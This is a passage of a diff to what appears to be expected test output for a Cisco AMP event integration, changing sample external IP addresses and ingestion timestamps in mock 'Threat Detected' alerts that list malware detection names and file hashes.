Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251439135752194\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", + "ingested": "2021-12-09T13:35:36.337190500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251439135752000,\"timestamp\":1610705841,\"timestamp_nanoseconds\":455000000,\"date\":\"2021-01-15T10:17:21+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251439135752194\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2389,7 +2389,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -2440,7 +2440,7 @@ "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2450,8 +2450,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174565817Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258981346935000,\"timestamp\":1610705834,\"timestamp_nanoseconds\":346000000,\"date\":\"2021-01-15T10:17:14+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258981346934873\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "ingested": "2021-12-09T13:35:36.337194500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258981346935000,\"timestamp\":1610705834,\"timestamp_nanoseconds\":346000000,\"date\":\"2021-01-15T10:17:14+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258981346934873\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2473,7 +2473,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2520,7 +2520,7 @@ "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2530,8 +2530,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174567845Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258929807327000,\"timestamp\":1610705822,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:02+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258929807327320\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "ingested": "2021-12-09T13:35:36.337199200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258929807327000,\"timestamp\":1610705822,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:02+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258929807327320\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2553,7 +2553,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2603,7 +2603,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2620,8 +2620,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174569865Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":470000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:36.337205100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":470000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2643,7 +2643,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2693,7 +2693,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2706,8 +2706,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174571915Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":112000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:36.337210900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":112000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2729,7 +2729,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2779,7 +2779,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2796,8 +2796,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174573957Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":71000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542425\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:36.337215400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":71000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542425\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2819,7 +2819,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2869,7 +2869,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2886,8 +2886,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174575965Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":532000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:36.337220Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":532000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2909,7 +2909,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2959,7 +2959,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2972,8 +2972,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174578120Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":454000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667841684537366\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:36.337244600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":454000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat 